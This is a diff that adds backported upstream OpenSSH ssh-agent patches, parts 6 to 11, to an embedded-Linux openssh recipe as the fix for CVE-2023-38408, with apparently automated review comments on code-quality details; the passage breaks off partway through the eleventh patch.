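Review bot: `restrict_websafe` is declared and cleared by the new `-O no-restrict-websafe` case in main(), but the check added to process_sign_request2 never reads it, so within the hunks shown the option is accepted and changes nothing. The outcome fails closed, since the restriction always applies, but an accepted switch with no effect misleads operators; the condition should start with the flag, `if (restrict_websafe && strncmp(id->key->sk_application, "ssh:", 4) != 0 &&`. Two smaller points in check_websafe_message_contents: both `fatal("%s: sshbuf_new", __func__)` messages follow calls to `sshbuf_from()`, and the header comment lacks the closing parenthesis after `"ssh:"`. process_sign_request2 and main() extend beyond their hunks.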
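diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
new file mode 100644
index 0000000000..ac494aab0b
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-06.patch
@@ -0,0 +1,73 @@
+From a5d845b7b42861d18f43e83de9f24c7374d1b458 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 18 Sep 2020 08:16:38 +0000
+Subject: [PATCH 06/12] upstream: handle multiple messages in a single read()
+
+PR#183 by Dennis Kaarsemaker; feedback and ok markus@
+
+OpenBSD-Commit-ID: 8570bb4d02d00cf70b98590716ea6a7d1cce68d1
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/52a03e9fca2d74eef953ddd4709250f365ca3975]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 19 +++++++++++++------
+ 1 file changed, 13 insertions(+), 6 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 1794f35..78f7268 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.258 2020/05/26 01:26:58 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -853,8 +853,10 @@ send:
+ }
+ #endif /* ENABLE_PKCS11 */
+
+-/* dispatch incoming messages */
+-
++/*
++ * dispatch incoming message.
++ * returns 1 on success, 0 for incomplete messages or -1 on error.
++ */
+ static int
+ process_message(u_int socknum)
+ {
+@@ -908,7 +910,7 @@ process_message(u_int socknum)
+ /* send a fail message for all other request types */
+ send_status(e, 0);
+ }
+- return 0;
++ return 1;
+ }
+
+ switch (type) {
+@@ -952,7 +954,7 @@ process_message(u_int socknum)
+ send_status(e, 0);
+ break;
+ }
+- return 0;
++ return 1;
+ }
+
+ static void
+@@ -1043,7 +1045,12 @@ handle_conn_read(u_int socknum)
+ if ((r = sshbuf_put(sockets[socknum].input, buf, len)) != 0)
+ fatal("%s: buffer error: %s", __func__, ssh_err(r));
+ explicit_bzero(buf, sizeof(buf));
+- process_message(socknum);
++ for (;;) {
++ if ((r = process_message(socknum)) == -1)
++ return -1;
++ else if (r == 0)
++ break;
++ }
+ return 0;
+ }
+
+--
+2.41.0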
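Review bot: The new `for (;;)` loop in handle_conn_read terminates only if every path in process_message that returns 1 has first removed a complete message from the socket's input buffer, and that consumption happens outside these hunks. The header comment added to process_message lists the three return values but not this invariant; I would extend it with `returns 1 only after consuming one complete message from the input buffer`, once the unseen part of the function has been checked against it. A -1 from process_message is also now propagated by handle_conn_read, where the old call discarded the return value, so the caller's handling of -1 should be confirmed as the intended response to a malformed request.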
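diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
new file mode 100644
index 0000000000..0dcf23ae17
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-07.patch
@@ -0,0 +1,125 @@
+From 653cc18c922fc387b3d3aa1b081c5e5283cce28a Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Tue, 26 Jan 2021 00:47:47 +0000
+Subject: [PATCH 07/12] upstream: use recallocarray to allocate the agent
+ sockets table;
+
+also clear socket entries that are being marked as unused.
+
+spinkle in some debug2() spam to make it easier to watch an agent
+do its thing.
+
+ok markus
+
+OpenBSD-Commit-ID: 74582c8e82e96afea46f6c7b6813a429cbc75922
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1fe16fd61bb53944ec510882acc0491abd66ff76]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 20 ++++++++++++++++----
+ 1 file changed, 16 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 78f7268..2635bc5 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.264 2020/09/18 08:16:38 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -175,11 +175,12 @@ static void
+ close_socket(SocketEntry *e)
+ {
+ close(e->fd);
+- e->fd = -1;
+- e->type = AUTH_UNUSED;
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ memset(e, '\0', sizeof(*e));
++ e->fd = -1;
++ e->type = AUTH_UNUSED;
+ }
+
+ static void
+@@ -249,6 +250,8 @@ process_request_identities(SocketEntry *e)
+ struct sshbuf *msg;
+ int r;
+
++ debug2("%s: entering", __func__);
++
+ if ((msg = sshbuf_new()) == NULL)
+ fatal("%s: sshbuf_new failed", __func__);
+ if ((r = sshbuf_put_u8(msg, SSH2_AGENT_IDENTITIES_ANSWER)) != 0 ||
+@@ -441,6 +444,7 @@ process_remove_identity(SocketEntry *e)
+ struct sshkey *key = NULL;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_froms(e->request, &key)) != 0) {
+ error("%s: get key: %s", __func__, ssh_err(r));
+ goto done;
+@@ -467,6 +471,7 @@ process_remove_all_identities(SocketEntry *e)
+ {
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ /* Loop over all identities and clear the keys. */
+ for (id = TAILQ_FIRST(&idtab->idlist); id;
+ id = TAILQ_FIRST(&idtab->idlist)) {
+@@ -520,6 +525,7 @@ process_add_identity(SocketEntry *e)
+ u_char ctype;
+ int r = SSH_ERR_INTERNAL_ERROR;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshkey_private_deserialize(e->request, &k)) != 0 ||
+ k == NULL ||
+ (r = sshbuf_get_cstring(e->request, &comment, NULL)) != 0) {
+@@ -667,6 +673,7 @@ process_lock_agent(SocketEntry *e, int lock)
+ static u_int fail_count = 0;
+ size_t pwlen;
+
++ debug2("%s: entering", __func__);
+ /*
+ * This is deliberately fatal: the user has requested that we lock,
+ * but we can't parse their request properly. The only safe thing to
+@@ -738,6 +745,7 @@ process_add_smartcard_key(SocketEntry *e)
+ struct sshkey **keys = NULL, *k;
+ Identity *id;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -818,6 +826,7 @@ process_remove_smartcard_key(SocketEntry *e)
+ int r, success = 0;
+ Identity *id, *nxt;
+
++ debug2("%s: entering", __func__);
+ if ((r = sshbuf_get_cstring(e->request, &provider, NULL)) != 0 ||
+ (r = sshbuf_get_cstring(e->request, &pin, NULL)) != 0) {
+ error("%s: buffer error: %s", __func__, ssh_err(r));
+@@ -962,6 +971,8 @@ new_socket(sock_type type, int fd)
+ {
+ u_int i, old_alloc, new_alloc;
+
++ debug("%s: type = %s", __func__, type == AUTH_CONNECTION ? "CONNECTION" :
++ (type == AUTH_SOCKET ? "SOCKET" : "UNKNOWN"));
+ set_nonblock(fd);
+
+ if (fd > max_fd)
+@@ -981,7 +992,8 @@ new_socket(sock_type type, int fd)
+ }
+ old_alloc = sockets_alloc;
+ new_alloc = sockets_alloc + 10;
+- sockets = xreallocarray(sockets, new_alloc, sizeof(sockets[0]));
++ sockets = xrecallocarray(sockets, old_alloc, new_alloc,
++ sizeof(sockets[0]));
+ for (i = old_alloc; i < new_alloc; i++)
+ sockets[i].type = AUTH_UNUSED;
+ sockets_alloc = new_alloc;
+--
+2.41.0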
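Review bot: The trace line added to new_socket uses `debug()` while every other trace added in this patch uses `debug2()`, so this one message appears one verbosity level earlier than the rest. Unless that is intended, make it `debug2("%s: type = %s", __func__, ...)` to match the others and the description's "debug2() spam". In close_socket the order of the new lines matters: `memset(e, '\0', sizeof(*e))` has to stay after the three sshbuf_free() calls and before `e->fd = -1`, and a one-line comment such as `/* wipe the freed entry, then mark it unused */` would protect that ordering.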
diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
new file mode 100644
index 0000000000..141c8113bf
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-08.patch
@@ -0,0 +1,315 @@
1From c30158ea225cf8ad67c3dcc88fa9e4afbf8959a7 Mon Sep 17 00:00:00 2001
2From: "djm@openbsd.org" <djm@openbsd.org>
3Date: Tue, 26 Jan 2021 00:53:31 +0000
4Subject: [PATCH 08/12] upstream: more ssh-agent refactoring
5
6Allow confirm_key() to accept an additional reason suffix
7
8Factor publickey userauth parsing out into its own function and allow
9it to optionally return things it parsed out of the message to its
10caller.
11
12feedback/ok markus@
13
14OpenBSD-Commit-ID: 29006515617d1aa2d8b85cd2bf667e849146477e
15
16Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/e0e8bee8024fa9e31974244d14f03d799e5c0775]
17CVE: CVE-2023-38408
18Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
19---
20 ssh-agent.c | 197 ++++++++++++++++++++++++++++++++++------------------
21 1 file changed, 130 insertions(+), 67 deletions(-)
22
23diff --git a/ssh-agent.c b/ssh-agent.c
24index 2635bc5..7ad323c 100644
25--- a/ssh-agent.c
26+++ b/ssh-agent.c
27@@ -1,4 +1,4 @@
28-/* $OpenBSD: ssh-agent.c,v 1.269 2021/01/26 00:47:47 djm Exp $ */
29+/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
30 /*
31 * Author: Tatu Ylonen <ylo@cs.hut.fi>
32 * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
33@@ -216,15 +216,16 @@ lookup_identity(struct sshkey *key)
34
35 /* Check confirmation of keysign request */
36 static int
37-confirm_key(Identity *id)
38+confirm_key(Identity *id, const char *extra)
39 {
40 char *p;
41 int ret = -1;
42
43 p = sshkey_fingerprint(id->key, fingerprint_hash, SSH_FP_DEFAULT);
44 if (p != NULL &&
45- ask_permission("Allow use of key %s?\nKey fingerprint %s.",
46- id->comment, p))
47+ ask_permission("Allow use of key %s?\nKey fingerprint %s.%s%s",
48+ id->comment, p,
49+ extra == NULL ? "" : "\n", extra == NULL ? "" : extra))
50 ret = 0;
51 free(p);
52
53@@ -290,74 +291,133 @@ agent_decode_alg(struct sshkey *key, u_int flags)
54 }
55
56 /*
57- * This function inspects a message to be signed by a FIDO key that has a
58- * web-like application string (i.e. one that does not begin with "ssh:".
59- * It checks that the message is one of those expected for SSH operations
60- * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
61- * for the web.
62+ * Attempt to parse the contents of a buffer as a SSH publickey userauth
63+ * request, checking its contents for consistency and matching the embedded
64+ * key against the one that is being used for signing.
65+ * Note: does not modify msg buffer.
66+ * Optionally extract the username and session ID from the request.
67 */
68 static int
69-check_websafe_message_contents(struct sshkey *key,
70- const u_char *msg, size_t len)
71+parse_userauth_request(struct sshbuf *msg, const struct sshkey *expected_key,
72+ char **userp, struct sshbuf **sess_idp)
73 {
74- int matched = 0;
75- struct sshbuf *b;
76- u_char m, n;
77- char *cp1 = NULL, *cp2 = NULL;
78+ struct sshbuf *b = NULL, *sess_id = NULL;
79+ char *user = NULL, *service = NULL, *method = NULL, *pkalg = NULL;
80 int r;
81+ u_char t, sig_follows;
82 struct sshkey *mkey = NULL;
83
84- if ((b = sshbuf_from(msg, len)) == NULL)
85- fatal("%s: sshbuf_new", __func__);
86+ if (userp != NULL)
87+ *userp = NULL;
88+ if (sess_idp != NULL)
89+ *sess_idp = NULL;
90+ if ((b = sshbuf_fromb(msg)) == NULL)
91+ fatal("%s: sshbuf_fromb", __func__);
92
93 /* SSH userauth request */
94- if ((r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* sess_id */
95- (r = sshbuf_get_u8(b, &m)) == 0 && /* SSH2_MSG_USERAUTH_REQUEST */
96- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* server user */
97- (r = sshbuf_get_cstring(b, &cp1, NULL)) == 0 && /* service */
98- (r = sshbuf_get_cstring(b, &cp2, NULL)) == 0 && /* method */
99- (r = sshbuf_get_u8(b, &n)) == 0 && /* sig-follows */
100- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* alg */
101- (r = sshkey_froms(b, &mkey)) == 0 && /* key */
102- sshbuf_len(b) == 0) {
103- debug("%s: parsed userauth", __func__);
104- if (m == SSH2_MSG_USERAUTH_REQUEST && n == 1 &&
105- strcmp(cp1, "ssh-connection") == 0 &&
106- strcmp(cp2, "publickey") == 0 &&
107- sshkey_equal(key, mkey)) {
108- debug("%s: well formed userauth", __func__);
109- matched = 1;
110- }
111+ if ((r = sshbuf_froms(b, &sess_id)) != 0)
112+ goto out;
113+ if (sshbuf_len(sess_id) == 0) {
114+ r = SSH_ERR_INVALID_FORMAT;
115+ goto out;
116 }
117- free(cp1);
118- free(cp2);
119- sshkey_free(mkey);
120+ if ((r = sshbuf_get_u8(b, &t)) != 0 || /* SSH2_MSG_USERAUTH_REQUEST */
121+ (r = sshbuf_get_cstring(b, &user, NULL)) != 0 || /* server user */
122+ (r = sshbuf_get_cstring(b, &service, NULL)) != 0 || /* service */
123+ (r = sshbuf_get_cstring(b, &method, NULL)) != 0 || /* method */
124+ (r = sshbuf_get_u8(b, &sig_follows)) != 0 || /* sig-follows */
125+ (r = sshbuf_get_cstring(b, &pkalg, NULL)) != 0 || /* alg */
126+ (r = sshkey_froms(b, &mkey)) != 0) /* key */
127+ goto out;
128+ if (t != SSH2_MSG_USERAUTH_REQUEST ||
129+ sig_follows != 1 ||
130+ strcmp(service, "ssh-connection") != 0 ||
131+ !sshkey_equal(expected_key, mkey) ||
132+ sshkey_type_from_name(pkalg) != expected_key->type) {
133+ r = SSH_ERR_INVALID_FORMAT;
134+ goto out;
135+ }
136+ if (strcmp(method, "publickey") != 0) {
137+ r = SSH_ERR_INVALID_FORMAT;
138+ goto out;
139+ }
140+ if (sshbuf_len(b) != 0) {
141+ r = SSH_ERR_INVALID_FORMAT;
142+ goto out;
143+ }
144+ /* success */
145+ r = 0;
146+ debug("%s: well formed userauth", __func__);
147+ if (userp != NULL) {
148+ *userp = user;
149+ user = NULL;
150+ }
151+ if (sess_idp != NULL) {
152+ *sess_idp = sess_id;
153+ sess_id = NULL;
154+ }
155+ out:
156 sshbuf_free(b);
157- if (matched)
158- return 1;
159+ sshbuf_free(sess_id);
160+ free(user);
161+ free(service);
162+ free(method);
163+ free(pkalg);
164+ sshkey_free(mkey);
165+ return r;
166+}
167
168- if ((b = sshbuf_from(msg, len)) == NULL)
169- fatal("%s: sshbuf_new", __func__);
170- cp1 = cp2 = NULL;
171- mkey = NULL;
172-
173- /* SSHSIG */
174- if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) == 0 &&
175- (r = sshbuf_consume(b, 6)) == 0 &&
176- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* namespace */
177- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* reserved */
178- (r = sshbuf_get_cstring(b, NULL, NULL)) == 0 && /* hashalg */
179- (r = sshbuf_get_string_direct(b, NULL, NULL)) == 0 && /* H(msg) */
180- sshbuf_len(b) == 0) {
181- debug("%s: parsed sshsig", __func__);
182- matched = 1;
183- }
184+/*
185+ * Attempt to parse the contents of a buffer as a SSHSIG signature request.
186+ * Note: does not modify buffer.
187+ */
188+static int
189+parse_sshsig_request(struct sshbuf *msg)
190+{
191+ int r;
192+ struct sshbuf *b;
193
194+ if ((b = sshbuf_fromb(msg)) == NULL)
195+ fatal("%s: sshbuf_fromb", __func__);
196+
197+ if ((r = sshbuf_cmp(b, 0, "SSHSIG", 6)) != 0 ||
198+ (r = sshbuf_consume(b, 6)) != 0 ||
199+ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* namespace */
200+ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0 || /* reserved */
201+ (r = sshbuf_get_cstring(b, NULL, NULL)) != 0 || /* hashalg */
202+ (r = sshbuf_get_string_direct(b, NULL, NULL)) != 0) /* H(msg) */
203+ goto out;
204+ if (sshbuf_len(b) != 0) {
205+ r = SSH_ERR_INVALID_FORMAT;
206+ goto out;
207+ }
208+ /* success */
209+ r = 0;
210+ out:
211 sshbuf_free(b);
212- if (matched)
213+ return r;
214+}
215+
216+/*
217+ * This function inspects a message to be signed by a FIDO key that has a
218+ * web-like application string (i.e. one that does not begin with "ssh:".
219+ * It checks that the message is one of those expected for SSH operations
220+ * (pubkey userauth, sshsig, CA key signing) to exclude signing challenges
221+ * for the web.
222+ */
223+static int
224+check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
225+{
226+ if (parse_userauth_request(data, key, NULL, NULL) == 0) {
227+ debug("%s: signed data matches public key userauth request", __func__);
228 return 1;
229+ }
230+ if (parse_sshsig_request(data) == 0) {
231+ debug("%s: signed data matches SSHSIG signature request", __func__);
232+ return 1;
233+ }
234
235- /* XXX CA signature operation */
236+ /* XXX check CA signature operation */
237
238 error("web-origin key attempting to sign non-SSH message");
239 return 0;
240@@ -367,21 +427,22 @@ check_websafe_message_contents(struct sshkey *key,
241 static void
242 process_sign_request2(SocketEntry *e)
243 {
244- const u_char *data;
245 u_char *signature = NULL;
246- size_t dlen, slen = 0;
247+ size_t i, slen = 0;
248 u_int compat = 0, flags;
249 int r, ok = -1;
250 char *fp = NULL;
251- struct sshbuf *msg;
252+ struct sshbuf *msg = NULL, *data = NULL;
253 struct sshkey *key = NULL;
254 struct identity *id;
255 struct notifier_ctx *notifier = NULL;
256
257- if ((msg = sshbuf_new()) == NULL)
258+ debug("%s: entering", __func__);
259+
260+ if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)
261 fatal("%s: sshbuf_new failed", __func__);
262 if ((r = sshkey_froms(e->request, &key)) != 0 ||
263- (r = sshbuf_get_string_direct(e->request, &data, &dlen)) != 0 ||
264+ (r = sshbuf_get_stringb(e->request, data)) != 0 ||
265 (r = sshbuf_get_u32(e->request, &flags)) != 0) {
266 error("%s: couldn't parse request: %s", __func__, ssh_err(r));
267 goto send;
268@@ -391,13 +452,13 @@ process_sign_request2(SocketEntry *e)
269 verbose("%s: %s key not found", __func__, sshkey_type(key));
270 goto send;
271 }
272- if (id->confirm && confirm_key(id) != 0) {
273+ if (id->confirm && confirm_key(id, NULL) != 0) {
274 verbose("%s: user refused key", __func__);
275 goto send;
276 }
277 if (sshkey_is_sk(id->key)) {
278 if (strncmp(id->key->sk_application, "ssh:", 4) != 0 &&
279- !check_websafe_message_contents(key, data, dlen)) {
280+ !check_websafe_message_contents(key, data)) {
281 /* error already logged */
282 goto send;
283 }
284@@ -411,7 +472,7 @@ process_sign_request2(SocketEntry *e)
285 }
286 }
287 if ((r = sshkey_sign(id->key, &signature, &slen,
288- data, dlen, agent_decode_alg(key, flags),
289+ sshbuf_ptr(data), sshbuf_len(data), agent_decode_alg(key, flags),
290 id->sk_provider, compat)) != 0) {
291 error("%s: sshkey_sign: %s", __func__, ssh_err(r));
292 goto send;
293@@ -420,8 +481,7 @@ process_sign_request2(SocketEntry *e)
294 ok = 0;
295 send:
296 notify_complete(notifier);
297- sshkey_free(key);
298- free(fp);
299+
300 if (ok == 0) {
301 if ((r = sshbuf_put_u8(msg, SSH2_AGENT_SIGN_RESPONSE)) != 0 ||
302 (r = sshbuf_put_string(msg, signature, slen)) != 0)
303@@ -432,7 +492,10 @@ process_sign_request2(SocketEntry *e)
304 if ((r = sshbuf_put_stringb(e->output, msg)) != 0)
305 fatal("%s: buffer error: %s", __func__, ssh_err(r));
306
307+ sshbuf_free(data);
308 sshbuf_free(msg);
309+ sshkey_free(key);
310+ free(fp);
311 free(signature);
312 }
313
314--
3152.41.0
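Review bot: The allocation check in process_sign_request2 joins its two tests with a bitwise `|`, `if ((msg = sshbuf_new()) == NULL | (data = sshbuf_new()) == NULL)`, while the parse check right below it uses `||` for the same pattern. Because `==` binds tighter than `|` the outcome is the same and both allocations run, but it reads as a typo and compilers may warn. Write `if ((msg = sshbuf_new()) == NULL || (data = sshbuf_new()) == NULL)` unless the non-short-circuit form is intended, in which case a comment should say so. The new local `size_t i` is not used in any hunk shown here, and the comment moved above check_websafe_message_contents still lacks the closing parenthesis after `"ssh:"`. process_sign_request2 extends beyond its hunks.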
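diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
new file mode 100644
index 0000000000..b519ccce42
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-09.patch
@@ -0,0 +1,38 @@
+From 7adba46611e5d076d7d12d9f4162dd4cabd5ff50 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:28:10 +0000
+Subject: [PATCH 09/12] upstream: give typedef'd struct a struct name; makes
+ the fuzzer I'm
+
+writing a bit easier
+
+OpenBSD-Commit-ID: 1052ab521505a4d8384d67acb3974ef81b8896cb
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/8afaa7d7918419d3da6c0477b83db2159879cb33]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7ad323c..c99927c 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.270 2021/01/26 00:53:31 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -108,7 +108,7 @@ typedef enum {
+ AUTH_CONNECTION
+ } sock_type;
+
+-typedef struct {
++typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+--
+2.41.0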
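diff --git a/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
new file mode 100644
index 0000000000..27b2eadfae
--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-10.patch
@@ -0,0 +1,39 @@
+From 343e2a2c0ef754a7a86118016b248f7a73f8d510 Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Fri, 29 Jan 2021 06:29:46 +0000
+Subject: [PATCH 10/12] upstream: fix the values of enum sock_type
+
+OpenBSD-Commit-ID: 18d048f4dbfbb159ff500cfc2700b8fb1407facd
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/1a4b92758690faa12f49079dd3b72567f909466d]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ ssh-agent.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/ssh-agent.c b/ssh-agent.c
+index c99927c..7f1e14b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.274 2021/01/29 06:28:10 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -103,9 +103,9 @@
+ #define AGENT_RBUF_LEN (4096)
+
+ typedef enum {
+- AUTH_UNUSED,
+- AUTH_SOCKET,
+- AUTH_CONNECTION
++ AUTH_UNUSED = 0,
++ AUTH_SOCKET = 1,
++ AUTH_CONNECTION = 2,
+ } sock_type;
+
+ typedef struct socket_entry {
+--
+2.41.0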
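--- /dev/null
+++ b/meta/recipes-connectivity/openssh/openssh/CVE-2023-38408-11.patch
@@ -0,0 +1,307 @@
+From 2b3b369c8cf71f9ef5942a5e074e6f86e7ca1e0c Mon Sep 17 00:00:00 2001
+From: "djm@openbsd.org" <djm@openbsd.org>
+Date: Sun, 19 Dec 2021 22:09:23 +0000
+Subject: [PATCH 11/12] upstream: ssh-agent side of binding
+
+record session ID/hostkey/forwarding status for each active socket.
+
+Attempt to parse data-to-be-signed at signature request time and extract
+session ID from the blob if it is a pubkey userauth request.
+
+ok markus@
+
+OpenBSD-Commit-ID: a80fd41e292b18b67508362129e9fed549abd318
+
+Upstream-Status: Backport [https://github.com/openssh/openssh-portable/commit/4c1e3ce85e183a9d0c955c88589fed18e4d6a058]
+CVE: CVE-2023-38408
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ authfd.h | 3 +
+ ssh-agent.c | 175 +++++++++++++++++++++++++++++++++++++++++++++++++---
+ 2 files changed, 170 insertions(+), 8 deletions(-)
+
+diff --git a/authfd.h b/authfd.h
+index c3bf625..9cc9807 100644
+--- a/authfd.h
++++ b/authfd.h
+@@ -76,6 +76,9 @@ int ssh_agent_sign(int sock, const struct sshkey *key,
+ #define SSH2_AGENTC_ADD_ID_CONSTRAINED 25
+ #define SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED 26
+
++/* generic extension mechanism */
++#define SSH_AGENTC_EXTENSION 27
++
+ #define SSH_AGENT_CONSTRAIN_LIFETIME 1
+ #define SSH_AGENT_CONSTRAIN_CONFIRM 2
+ #define SSH_AGENT_CONSTRAIN_MAXSIGN 3
+diff --git a/ssh-agent.c b/ssh-agent.c
+index 7f1e14b..01c7f2b 100644
+--- a/ssh-agent.c
++++ b/ssh-agent.c
+@@ -1,4 +1,4 @@
+-/* $OpenBSD: ssh-agent.c,v 1.275 2021/01/29 06:29:46 djm Exp $ */
++/* $OpenBSD: ssh-agent.c,v 1.280 2021/12/19 22:09:23 djm Exp $ */
+ /*
+ * Author: Tatu Ylonen <ylo@cs.hut.fi>
+ * Copyright (c) 1995 Tatu Ylonen <ylo@cs.hut.fi>, Espoo, Finland
+@@ -98,9 +98,15 @@
+ #endif
+
+ /* Maximum accepted message length */
+-#define AGENT_MAX_LEN (256*1024)
++#define AGENT_MAX_LEN (256*1024)
+ /* Maximum bytes to read from client socket */
+-#define AGENT_RBUF_LEN (4096)
++#define AGENT_RBUF_LEN (4096)
++/* Maximum number of recorded session IDs/hostkeys per connection */
++#define AGENT_MAX_SESSION_IDS 16
++/* Maximum size of session ID */
++#define AGENT_MAX_SID_LEN 128
++
++/* XXX store hostkey_sid in a refcounted tree */
+
+ typedef enum {
+ AUTH_UNUSED = 0,
+@@ -108,12 +114,20 @@ typedef enum {
+ AUTH_CONNECTION = 2,
+ } sock_type;
+
++struct hostkey_sid {
++ struct sshkey *key;
++ struct sshbuf *sid;
++ int forwarded;
++};
++
+ typedef struct socket_entry {
+ int fd;
+ sock_type type;
+ struct sshbuf *input;
+ struct sshbuf *output;
+ struct sshbuf *request;
++ size_t nsession_ids;
++ struct hostkey_sid *session_ids;
+ } SocketEntry;
+
+ u_int sockets_alloc = 0;
+@@ -174,10 +188,17 @@ static int restrict_websafe = 1;
+ static void
+ close_socket(SocketEntry *e)
+ {
++ size_t i;
++
+ close(e->fd);
+ sshbuf_free(e->input);
+ sshbuf_free(e->output);
+ sshbuf_free(e->request);
++ for (i = 0; i < e->nsession_ids; i++) {
++ sshkey_free(e->session_ids[i].key);
++ sshbuf_free(e->session_ids[i].sid);
++ }
++ free(e->session_ids);
+ memset(e, '\0', sizeof(*e));
+ e->fd = -1;
+ e->type = AUTH_UNUSED;
+@@ -423,6 +444,18 @@ check_websafe_message_contents(struct sshkey *key, struct sshbuf *data)
+ return 0;
+ }
+
++static int
++buf_equal(const struct sshbuf *a, const struct sshbuf *b)
++{
++ if (sshbuf_ptr(a) == NULL || sshbuf_ptr(b) == NULL)
++ return SSH_ERR_INVALID_ARGUMENT;
++ if (sshbuf_len(a) != sshbuf_len(b))
++ return SSH_ERR_INVALID_FORMAT;
++ if (timingsafe_bcmp(sshbuf_ptr(a), sshbuf_ptr(b), sshbuf_len(a)) != 0)
++ return SSH_ERR_INVALID_FORMAT;
++ return 0;
++}
++
+ /* ssh2 only */
+ static void
+ process_sign_request2(SocketEntry *e)
+@@ -431,8 +464,8 @@ process_sign_request2(SocketEntry *e)
+ size_t i, slen = 0;
+ u_int compat = 0, flags;
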